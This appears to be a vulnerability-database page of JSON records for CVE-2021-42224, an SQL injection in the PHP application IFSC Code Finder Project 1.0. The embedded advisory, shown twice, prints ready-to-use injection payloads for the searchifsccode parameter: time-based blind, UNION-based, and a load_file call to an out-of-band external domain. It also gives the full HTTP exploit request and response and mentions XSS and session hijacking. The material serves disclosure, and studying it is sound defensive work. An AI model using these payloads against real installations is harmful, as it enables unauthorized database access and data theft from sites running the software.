IFSC Code Finder Project 1.0 SQL Injection

2021-10-14T00:00:00

Description

{"id": "PACKETSTORM:164514", "type": "packetstorm", "bulletinFamily": "exploit", "title": "IFSC Code Finder Project 1.0 SQL Injection", "description": "", "published": "2021-10-14T00:00:00", "modified": "2021-10-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/164514/IFSC-Code-Finder-Project-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": ["CVE-2021-42224"], "immutableFields": [], "lastseen": "2021-10-14T15:40:24", "viewCount": 116, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-42224"]}, {"type": "zdt", "idList": ["1337DAY-ID-36912"]}], "rev": 4}, "score": {"value": 5.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-42224"]}, {"type": "zdt", "idList": ["1337DAY-ID-36912"]}]}, "exploitation": null, "vulnersScore": 5.5}, "sourceHref": "https://packetstormsecurity.com/files/download/164514/ifsccodefinger10-sql.txt", "sourceData": "`Hello, dear friends. \n \nKR \n \n## [CVE-2021-42224](https://phpgurukul.com/ifsc-code-finder-project-using-php/) \n## [Vendor](https://phpgurukul.com/author/admin/) \n![](https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-42224/docs/Screenshot%202021-10-14%20104403.png) \n \n## Description: \n- vulnerability: `all or nothing` \n \nSQL Injection vulnerability exists in IFSC Code Finder Project 1.0 via \nthe searchifsccode POST parameter in /search.php. \nThe searchifsccode parameter appears to be vulnerable to SQL injection \nattacks. The test payload '+(select \nload_file('\\\\\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\\\ing'))+' \nwas submitted in the searchifsccode parameter. This payload injects a \nSQL sub-query that calls MySQL's load_file function with a UNC file \npath that references a URL on an external domain. The application \ninteracted with that domain, indicating that the injected SQL query \nwas executed. Also the parameter \"searchifsccode\" from search.php is \nXSS-Dom vulnerable plus PHPSESSID hijacking. \n \n## SQL injection Types \n \n```mysql \n--- \nParameter: searchifsccode (POST) \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: searchifsccode=849487'+(select \nload_file('\\\\\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\\\ing'))+'') \nAND (SELECT 1445 FROM (SELECT(SLEEP(5)))EBDq) AND \n('ubep'='ubep&search=%C2%9E%C3%A9e \n \nType: UNION query \nTitle: Generic UNION query (NULL) - 2 columns \nPayload: searchifsccode=849487'+(select \nload_file('\\\\\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\\\ing'))+'') \nUNION ALL SELECT \nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176766b71,0x624a5562647364654b616a684c6d546a427263576377794168415561525872414e53664d6a6e6444,0x7171786271),NULL-- \n-&search=%C2%9E%C3%A9e \n--- \n``` \n## Mysql Request: \n \n```mysql \nPOST /IFSC%20Code%20Finder%20Project%20Using%20PHP/ifscfinder/search.php \nHTTP/1.1 \nHost: 192.168.1.180 \nOrigin: http://192.168.1.180 \nCookie: PHPSESSID=jmir9unlgf2inpr758uva4ruhb \nUpgrade-Insecure-Requests: 1 \nReferer: http://192.168.1.180/IFSC%20Code%20Finder%20Project%20Using%20PHP/ifscfinder/ \nContent-Type: application/x-www-form-urlencoded \nAccept-Encoding: gzip, deflate \nAccept: */* \nAccept-Language: en-US,en-GB;q=0.9,en;q=0.8 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) \nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 \nSafari/537.36 \nConnection: close \nCache-Control: max-age=0 \nContent-Length: 42 \n \nsearchifsccode=849487'%2b(select%20load_file('%5c%5c%5c%5cbp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net%5c%5cing'))%2b'&search=%C2%9E%C3%A9e \n``` \n \n## MySQL Response: \n \n```mysql \nHTTP/1.1 200 OK \nDate: Thu, 14 Oct 2021 07:02:37 GMT \nServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 \nX-Powered-By: PHP/7.4.24 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate \nPragma: no-cache \nContent-Length: 7797 \nConnection: close \nContent-Type: text/html; charset=UTF-8 \n \n<!doctype html> \n<html class=\"no-js\" lang=\"en\"> \n \n<head> \n \n \n<title>IFSC Code Finder Portal | Home</title> \n \n \n<link \n...[SNIP]... \n``` \n## Proof: \n[href](https://streamable.com/kqadhc) \n \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/CVE-2021-42224) \n \n \n-- \nSystem Administrator - Infrastructure Engineer \nPenetration Testing Engineer \nExploit developer at https://packetstormsecurity.com/ \nhttps://cve.mitre.org/index.html and https://www.exploit-db.com/ \nhome page: https://www.nu11secur1ty.com/ \nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= \nnu11secur1ty <http://nu11secur1ty.com/> \n`\n", "_state": {"dependencies": 1646272274}}

{"zdt": [{"lastseen": "2021-12-03T01:52:23", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-14T00:00:00", "type": "zdt", "title": "IFSC Code Finder Project 1.0 SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42224"], "modified": "2021-10-14T00:00:00", "id": "1337DAY-ID-36912", "href": "https://0day.today/exploit/description/36912", "sourceData": "## IFSC Code Finder Project 1.0 SQL Injection Vulnerability\n## [CVE-2021-42224](https://phpgurukul.com/ifsc-code-finder-project-using-php/)\n## [Vendor](https://phpgurukul.com/author/admin/)\n![](https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-42224/docs/Screenshot%202021-10-14%20104403.png)\n\n## Description:\n- vulnerability: `all or nothing`\n\nSQL Injection vulnerability exists in IFSC Code Finder Project 1.0 via\nthe searchifsccode POST parameter in /search.php.\nThe searchifsccode parameter appears to be vulnerable to SQL injection\nattacks. The test payload '+(select\nload_file('\\\\\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\\\ing'))+'\nwas submitted in the searchifsccode parameter. This payload injects a\nSQL sub-query that calls MySQL's load_file function with a UNC file\npath that references a URL on an external domain. The application\ninteracted with that domain, indicating that the injected SQL query\nwas executed. Also the parameter \"searchifsccode\" from search.php is\nXSS-Dom vulnerable plus PHPSESSID hijacking.\n\n## SQL injection Types\n\n```mysql\n---\nParameter: searchifsccode (POST)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: searchifsccode=849487'+(select\nload_file('\\\\\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\\\ing'))+'')\nAND (SELECT 1445 FROM (SELECT(SLEEP(5)))EBDq) AND\n('ubep'='ubep&search=%C2%9E%C3%A9e\n\n Type: UNION query\n Title: Generic UNION query (NULL) - 2 columns\n Payload: searchifsccode=849487'+(select\nload_file('\\\\\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\\\ing'))+'')\nUNION ALL SELECT\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176766b71,0x624a5562647364654b616a684c6d546a427263576377794168415561525872414e53664d6a6e6444,0x7171786271),NULL--\n-&search=%C2%9E%C3%A9e\n---\n```\n## Mysql Request:\n\n```mysql\nPOST /IFSC%20Code%20Finder%20Project%20Using%20PHP/ifscfinder/search.php\nHTTP/1.1\nHost: 192.168.1.180\nOrigin: http://192.168.1.180\nCookie: PHPSESSID=jmir9unlgf2inpr758uva4ruhb\nUpgrade-Insecure-Requests: 1\nReferer: http://192.168.1.180/IFSC%20Code%20Finder%20Project%20Using%20PHP/ifscfinder/\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en-US,en-GB;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61\nSafari/537.36\nConnection: close\nCache-Control: max-age=0\nContent-Length: 42\n\nsearchifsccode=849487'%2b(select%20load_file('%5c%5c%5c%5cbp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net%5c%5cing'))%2b'&search=%C2%9E%C3%A9e\n```\n\n## MySQL Response:\n\n```mysql\nHTTP/1.1 200 OK\nDate: Thu, 14 Oct 2021 07:02:37 GMT\nServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24\nX-Powered-By: PHP/7.4.24\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nContent-Length: 7797\nConnection: close\nContent-Type: text/html; charset=UTF-8\n\n<!doctype html>\n<html class=\"no-js\" lang=\"en\">\n\n<head>\n\n\n<title>IFSC Code Finder Portal | Home</title>\n\n\n<link\n...[SNIP]...\n```\n## Proof:\n[href](https://streamable.com/kqadhc)\n\n## Reproduce:\n[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/CVE-2021-42224)\n", "sourceHref": "https://0day.today/exploit/36912", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T19:28:10", "description": "SQL Injection vulnerability exists in IFSC Code Finder Project 1.0 via the searchifsccode POST parameter in /search.php.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T18:15:00", "type": "cve", "title": "CVE-2021-42224", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42224"], "modified": "2021-10-19T19:57:00", "cpe": ["cpe:/a:ifsc_code_finder_project:ifsc_code_finder:1.0"], "id": "CVE-2021-42224", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42224", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ifsc_code_finder_project:ifsc_code_finder:1.0:*:*:*:*:*:*:*"]}]}

IFSC Code Finder Project 1.0 SQL Injection

Description

Related